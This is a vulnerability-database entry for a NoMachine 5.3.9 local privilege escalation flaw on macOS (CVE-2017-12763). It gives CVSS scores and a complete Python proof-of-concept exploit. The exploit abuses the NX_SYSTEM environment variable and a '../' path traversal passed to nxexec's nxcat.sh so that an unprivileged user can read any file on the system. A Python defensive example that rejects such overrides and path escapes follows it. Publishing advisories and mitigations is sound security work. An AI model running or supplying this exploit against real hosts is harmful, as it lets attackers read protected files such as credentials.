CVSS2: 9 High
Attack Vector: NETWORK
Attack Complexity: LOW
Authentication: SINGLE
Confidentiality Impact: COMPLETE
Integrity Impact: COMPLETE
Availability Impact: COMPLETE
Vector: AV:N/AC:L/Au:S/C:C/I:C/A:C

CVSS3: 8.8 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: LOW
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

AI Score: 8.9 High
Confidence: High

EPSS: 0.007 Low
Percentile: 79.6%

"""
# Exploit Title: NoMachine LPE - Local Privilege Escalation
# Date: 09/08/2017
# Exploit Author: Daniele Linguaglossa
# Vendor Homepage: https://www.nomachine.com
# Software Link: https://www.nomachine.com
# Version: 5.3.9
# Tested on: OSX
# CVE : CVE-2017-12763
NoMachine uses a file called nxexec to execute different actions as super user. nxexec allows executing
sh files within a sandboxed path; additionally, other checks such as parent process name and parent process path are
performed to be sure that only NoMachine applications are allowed to execute nxexec.
nxnode.bin allows spoofing a local path via the NX_SYSTEM environment variable. This is used to craft a path where a perl
file will be executed. This PoC exploits the NX_SYSTEM variable to allow a custom perl file to call nxexec
and execute the privileged nxcat.sh script in order to read any file on the filesystem.
"""
import os
import sys

print "[!] NoMachine - EoP - Read any file by @dzonerzy"
if len(sys.argv) == 4:
    nxnode = sys.argv[1]
    nxexec = sys.argv[2]
    toread = sys.argv[3]
    user = os.environ.get("USER")
    tmp_path = "/tmp/lib/perl/nxnode"
    tmp_file = "/tmp/lib/perl/nxnode/nxnode.pl"
    tmp_file_content = "print \"[*] Exploiting vulnerability\\n\";" \
                       "system(\"{0} " \
                       "nxcat.sh 1 {1} 2 '../../../../../..{2}'\");".format(nxexec, user, toread)
    print "[*] Crafting tmp environment"
    os.system("mkdir -p {0}".format(tmp_path))
    with open(tmp_file,"w") as tmp:
        tmp.write(tmp_file_content)
        tmp.close()
    os.system("NX_SYSTEM=/tmp {0}".format(nxnode))
    os.unlink(tmp_file)
    os.system("rm -r /tmp/lib")
else:
    print "Usage: {0} <path of nxnode.bin> <path of nxexec> <file to read>".format(sys.argv[0])
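
A defensive counterpart to the flaw described in the header above, as an added Python 3 example that is not part of the original PoC or NoMachine's code: a privileged helper refuses a caller-supplied NX_SYSTEM that does not resolve to its fixed install root, and resolves file arguments with symlinks followed before checking that they stay inside the allowed directory. The function names, PolicyError and the temporary directory layout are hypothetical and constructed for the demonstration.

```python
import os
import tempfile


class PolicyError(Exception):
    """Raised when a caller-supplied location fails a check (hypothetical name)."""


def install_root(env, fixed_root):
    """Honour NX_SYSTEM only when it resolves to the fixed install root."""
    fixed = os.path.realpath(fixed_root)
    override = env.get("NX_SYSTEM")
    if override is not None and os.path.realpath(override) != fixed:
        raise PolicyError("NX_SYSTEM override rejected: %r" % override)
    return fixed


def resolve_inside(base, requested):
    """Resolve requested under base with symlinks followed; refuse escapes."""
    base = os.path.realpath(base)
    # lstrip stops an absolute argument from replacing base in os.path.join
    target = os.path.realpath(os.path.join(base, requested.lstrip("/")))
    if os.path.commonpath([base, target]) != base:
        raise PolicyError("path escapes %s: %r" % (base, requested))
    return target


def demo():
    """Constructed layout: <root>/logs is allowed, <root>/secret is not."""
    root = os.path.realpath(tempfile.mkdtemp())
    logs, secret = os.path.join(root, "logs"), os.path.join(root, "secret")
    os.mkdir(logs)
    for name in (os.path.join(logs, "session.log"), secret):
        with open(name, "w") as fh:
            fh.write("constructed sample\n")
    os.symlink(secret, os.path.join(logs, "link"))
    outcome = {}
    for label, arg in (("plain", "session.log"),
                       ("dotdot", "../../../../../.." + secret),
                       ("symlink", "link")):
        try:
            resolve_inside(logs, arg)
            outcome[label] = "allowed"
        except PolicyError:
            outcome[label] = "rejected"
    return outcome


if __name__ == "__main__":
    print(demo())
```

Both checks compare fully resolved paths, so a chain of `../` components and a symlink planted inside the allowed directory are rejected by the same test.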